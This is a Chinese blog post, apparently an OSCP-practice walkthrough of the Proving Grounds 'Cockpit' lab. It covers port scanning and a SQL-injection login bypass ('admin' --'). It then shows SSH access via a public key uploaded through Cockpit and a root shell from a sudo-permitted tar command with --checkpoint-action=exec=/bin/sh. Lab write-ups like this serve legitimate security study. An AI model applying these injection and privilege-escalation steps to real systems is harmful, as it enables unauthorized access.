<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
<meta name="baidu-site-verification" content="codeva-l4PbCwKc7Z">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="FEUc84rh7dgaXl_JOY_Bq7sulvZljH">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Monaco:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.thiiiiink.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"default"},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":true,"lazyload":true,"pangu":true,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Proving Grounds Practice Lab中Cockpit打靶过程记录">
<meta property="og:type" content="article">
<meta property="og:title" content="Proving Grounds Practice - Cockpit">
<meta property="og:url" content="https://www.thiiiiink.com/post/20250215022657.html">
<meta property="og:site_name" content="临渊羡鱼">
<meta property="og:description" content="Proving Grounds Practice Lab中Cockpit打靶过程记录">
<meta property="og:locale">
<meta property="og:image" content="https://thiiiiink.com/202508/asynccode-45.png.png">
<meta property="og:image" content="https://thiiiiink.com/202508/asynccode-44.png.png">
<meta property="og:image" content="https://thiiiiink.com/202508/asynccode-46.png.png">
<meta property="og:image" content="https://thiiiiink.com/202508/asynccode-42.png.png">
<meta property="og:image" content="https://thiiiiink.com/202508/asynccode-43.png.png">
<meta property="og:image" content="https://thiiiiink.com/202508/asynccode-41.png.png">
<meta property="og:image" content="https://thiiiiink.com/202508/asynccode-47.png.png">
<meta property="article:published_time" content="2025-02-14T18:26:57.000Z">
<meta property="article:modified_time" content="2025-09-30T07:58:41.262Z">
<meta property="article:author" content="Yiaos">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://thiiiiink.com/202508/asynccode-45.png.png">

<link rel="canonical" href="https://www.thiiiiink.com/post/20250215022657.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>Proving Grounds Practice - Cockpit | 临渊羡鱼</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-J67WGCEZY5"></script>
    <script>
      if (CONFIG.hostname === location.hostname) {
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'G-J67WGCEZY5');
      }
    </script>


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?257c5564d6a2b53ffc355cd89f5f2095";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta custom-logo">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">临渊羡鱼</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">退而结网</p>
      <a>
        <img class="custom-logo-image" src="/images/avatar.gif" alt="临渊羡鱼">
      </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" placeholder="Searching..." spellcheck="false" type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="https://www.thiiiiink.com/post/20250215022657.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Yiaos">
      <meta itemprop="description" content>
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="临渊羡鱼">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Proving Grounds Practice - Cockpit
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2025-02-15 02:26:57" itemprop="dateCreated datePublished" datetime="2025-02-15T02:26:57+08:00">2025-02-15</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2025-09-30 15:58:41" itemprop="dateModified" datetime="2025-09-30T15:58:41+08:00">2025-09-30</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/What-We-Do-%E4%B8%89%E5%A4%A9%E6%89%93%E9%B1%BC/" itemprop="url" rel="index"><span itemprop="name">What We Do-三天打鱼</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/What-We-Do-%E4%B8%89%E5%A4%A9%E6%89%93%E9%B1%BC/OSCP/" itemprop="url" rel="index"><span itemprop="name">OSCP</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/What-We-Do-%E4%B8%89%E5%A4%A9%E6%89%93%E9%B1%BC/OSCP/PG-Lab/" itemprop="url" rel="index"><span itemprop="name">PG Lab</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
            <div class="post-description">Proving Grounds Practice Lab中Cockpit打靶过程记录</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="scans"><a href="#scans" class="headerlink" title="scans"></a>scans</h1><p>autorecon</p>
<p><img data-src="https://thiiiiink.com/202508/asynccode-45.png.png"></p>
<h2 id="info"><a href="#info" class="headerlink" title="info"></a>info</h2><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">- OS</span><br><span class="line">  Ubuntu <span class="number">20.04</span><span class="number">.6</span> LTS</span><br><span class="line">- ports</span><br><span class="line">- <span class="number">22</span></span><br><span class="line">  openSSH <span class="number">8.2</span></span><br><span class="line">- <span class="number">80</span></span><br><span class="line">  Apache <span class="number">2.4</span><span class="number">.41</span></span><br><span class="line">  Title<span class="punctuation">:</span> blaze</span><br><span class="line"></span><br><span class="line">  http<span class="punctuation">:</span><span class="comment">//192.168.166.10/img/</span></span><br><span class="line">  http<span class="punctuation">:</span><span class="comment">//192.168.166.10/blocked.html</span></span><br><span class="line">  http<span class="punctuation">:</span><span class="comment">//192.168.166.10/login.php</span></span><br><span class="line">  http<span class="punctuation">:</span><span class="comment">//192.168.166.10/db_config.php</span></span><br><span class="line">- <span class="number">9090</span></span><br><span class="line">  version <span class="number">2.1</span><span class="number">.4</span></span><br><span class="line">  OpenSSL <span class="number">3.3</span><span class="number">.2</span><span class="number">.3</span></span><br><span class="line">  ssl/zeus-admin?</span><br><span class="line">- things to try</span><br><span class="line">  - apache <span class="number">2.4</span><span class="number">.41</span></span><br><span class="line">  - <span class="number">80</span> admin</span><br><span class="line">  - <span class="number">9090</span> zeus-admin</span><br><span class="line">  - blaze username</span><br><span class="line">  - cockpit</span><br></pre></td></tr></table></figure>

<h2 id="22-openssh-8-2"><a href="#22-openssh-8-2" class="headerlink" title="22 openssh 8.2"></a>22 openssh 8.2</h2><p>没有已知漏洞</p>
<h2 id="80-blaze"><a href="#80-blaze" class="headerlink" title="80 blaze"></a>80 blaze</h2><p>登录192.168.166.10</p>
<p><img data-src="https://thiiiiink.com/202508/asynccode-44.png.png"></p>
<p>弱密码admin:admin&#x2F;123456&#x2F;password&#x2F;abc123 都不正确</p>
<h2 id="9090-cockpit"><a href="#9090-cockpit" class="headerlink" title="9090 cockpit"></a>9090 cockpit</h2><p>192.168.166.10:9090</p>
<p><img data-src="https://thiiiiink.com/202508/asynccode-46.png.png"></p>
<p>弱密码登录无效</p>
<p>查看源码cms: cockpit</p>
<p><img data-src="https://thiiiiink.com/202508/asynccode-42.png.png"></p>
<p>searchsploit cockpit 已知漏洞，利用不成功，搜索cockpit exploit也没有收货</p>
<p><img data-src="https://thiiiiink.com/202508/asynccode-43.png.png"></p>
<h1 id="foothold"><a href="#foothold" class="headerlink" title="foothold"></a>foothold</h1><p>查看hits, blaze存在sql注入漏洞，admin’ –</p>
<p>登录后得到用户和base64编码的密码</p>
<p><img data-src="https://thiiiiink.com/202508/asynccode-41.png.png"></p>
<p>解码后得到</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">james</span><br><span class="line">canttouchhhthiss@<span class="number">455152</span></span><br><span class="line"></span><br><span class="line">cameron</span><br><span class="line">thisscanttbetouchedd@<span class="number">455152</span></span><br></pre></td></tr></table></figure>

<p>使用james和密码ssh登录，发现只支持使用公私钥验证</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh james@<span class="number">192.168</span><span class="number">.166</span><span class="number">.10</span></span><br><span class="line">james@<span class="number">192.168</span><span class="number">.166</span><span class="number">.10</span><span class="punctuation">:</span> Permission denied (publickey).</span><br></pre></td></tr></table></figure>

<p>9090使用james登录，在账户里发现可以上传公钥</p>
<p><img data-src="https://thiiiiink.com/202508/asynccode-47.png.png"></p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">ssh james@<span class="number">192.168</span><span class="number">.166</span><span class="number">.10</span></span><br><span class="line"></span><br><span class="line">whoami</span><br><span class="line">james</span><br></pre></td></tr></table></figure>

<h1 id="escalation"><a href="#escalation" class="headerlink" title="escalation"></a>escalation</h1><p>检查进程、定时任务等没有收获，sudo -l 发现可以执行tar命令， <code>https://gtfobins.github.io/gtfobins/tar/</code>直接提权root</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">sudo -l</span><br><span class="line">Matching Defaults entries for james on blaze<span class="punctuation">:</span></span><br><span class="line">    env_reset<span class="punctuation">,</span> mail_badpass<span class="punctuation">,</span> secure_path=/usr/local/sbin\<span class="punctuation">:</span>/usr/local/bin\<span class="punctuation">:</span>/usr/sbin\<span class="punctuation">:</span>/usr/bin\<span class="punctuation">:</span>/sbin\<span class="punctuation">:</span>/bin\<span class="punctuation">:</span>/snap/bin</span><br><span class="line"></span><br><span class="line">User james may run the following commands on blaze<span class="punctuation">:</span></span><br><span class="line">    (ALL) NOPASSWD<span class="punctuation">:</span> /usr/bin/tar -czvf /tmp/backup.tar.gz *</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">sudo /usr/bin/tar -czvf /tmp/backup.tar.gz * --checkpoint=<span class="number">1</span> --checkpoint-action=exec=/bin/sh</span><br><span class="line">apt-changelog-ZA6iyM/</span><br><span class="line">snap-private-tmp/</span><br><span class="line">snap-private-tmp/snap.lxd/</span><br><span class="line">snap-private-tmp/snap.lxd/tmp/</span><br><span class="line">ssh<span class="number">-6</span>KkSqBBpG1eF/</span><br><span class="line">/usr/bin/tar<span class="punctuation">:</span> ssh<span class="number">-6</span>KkSqBBpG1eF/agent<span class="number">.131828</span><span class="punctuation">:</span> socket ignored</span><br><span class="line">systemd-private<span class="number">-1</span>c25937d4cfb4fd0b9e84c8d8e470646-apache2.service<span class="number">-43</span>mHFi/</span><br><span class="line">systemd-private<span class="number">-1</span>c25937d4cfb4fd0b9e84c8d8e470646-apache2.service<span class="number">-43</span>mHFi/tmp/</span><br><span class="line">systemd-private<span class="number">-1</span>c25937d4cfb4fd0b9e84c8d8e470646-ModemManager.service-l1tS1f/</span><br><span class="line">systemd-private<span class="number">-1</span>c25937d4cfb4fd0b9e84c8d8e470646-ModemManager.service-l1tS1f/tmp/</span><br><span class="line">systemd-private<span class="number">-1</span>c25937d4cfb4fd0b9e84c8d8e470646-systemd-logind.service<span class="number">-0</span>vp5Lh/</span><br><span class="line">systemd-private<span class="number">-1</span>c25937d4cfb4fd0b9e84c8d8e470646-systemd-logind.service<span class="number">-0</span>vp5Lh/tmp/</span><br><span class="line">systemd-private<span class="number">-1</span>c25937d4cfb4fd0b9e84c8d8e470646-systemd-resolved.service-pGOwNf/</span><br><span class="line">systemd-private<span class="number">-1</span>c25937d4cfb4fd0b9e84c8d8e470646-systemd-resolved.service-pGOwNf/tmp/</span><br><span class="line">systemd-private<span class="number">-1</span>c25937d4cfb4fd0b9e84c8d8e470646-systemd-timesyncd.service-Ll8SPh/</span><br><span class="line">systemd-private<span class="number">-1</span>c25937d4cfb4fd0b9e84c8d8e470646-systemd-timesyncd.service-Ll8SPh/tmp/</span><br><span class="line">systemd-private<span class="number">-1</span>c25937d4cfb4fd0b9e84c8d8e470646-upower.service<span class="number">-65</span>G4Yi/</span><br><span class="line">systemd-private<span class="number">-1</span>c25937d4cfb4fd0b9e84c8d8e470646-upower.service<span class="number">-65</span>G4Yi/tmp/</span><br><span class="line">tmp.es7Hxs9VMb</span><br><span class="line">tmp.eXjbihXM2N</span><br><span class="line">tmp.gvPWK74jcw</span><br><span class="line"># id</span><br><span class="line">uid=<span class="number">0</span>(root) gid=<span class="number">0</span>(root) groups=<span class="number">0</span>(root)</span><br><span class="line"># whoami</span><br><span class="line">root</span><br></pre></td></tr></table></figure>

<h1 id="反思"><a href="#反思" class="headerlink" title="反思"></a>反思</h1><ol>
<li><p>最近刷lab都是使用已知漏洞，最应该尝试的sql注入都没有测试</p>
</li>
<li><p>发现无法利用的exploit 不要死磕？oscp不会考需要修改很多才能利用的题目？</p>
</li>
</ol>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Yiaos
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="https://www.thiiiiink.com/post/20250215022657.html" title="Proving Grounds Practice - Cockpit">https://www.thiiiiink.com/post/20250215022657.html</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow noopener noreferrer" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/post/20250215225233.html" rel="prev" title="Proving Grounds Practice - Levram">
      <i class="fa fa-chevron-left"></i> Proving Grounds Practice - Levram
    </a></div>
      <div class="post-nav-item">
    <a href="/post/20250214231937.html" rel="next" title="Proving Grounds Practice - Clue">
      Proving Grounds Practice - Clue <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#scans"><span class="nav-text">scans</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#info"><span class="nav-text">info</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#22-openssh-8-2"><span class="nav-text">22 openssh 8.2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#80-blaze"><span class="nav-text">80 blaze</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#9090-cockpit"><span class="nav-text">9090 cockpit</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#foothold"><span class="nav-text">foothold</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#escalation"><span class="nav-text">escalation</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%8D%E6%80%9D"><span class="nav-text">反思</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Yiaos</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">38</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/yiaos" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;yiaos" rel="external nofollow noopener noreferrer" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="external nofollow noopener noreferrer" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yiaos</span>
</div>
        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/medium-zoom@1/dist/medium-zoom.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/lozad@1/dist/lozad.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/pangu@4/dist/browser/pangu.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>




  
  <script>
    (function(){
      var canonicalURL, curProtocol;
      //Get the <link> tag
      var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
    //Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
      //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
      !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
  </script>




  
<script src="/js/local-search.js"></script>













  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : 'Ov23lioxBWzEMyWt1JhD',
      clientSecret: '6d63e8f9065e954d63e6a90407d40a3ccee85f0e',
      repo        : 'Yiaos.github.io',
      owner       : 'Yiaos',
      admin       : ['Yiaos'],
      id          : 'c0b17d923bea66b909aa23c831defbb9',
        language: 'en',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
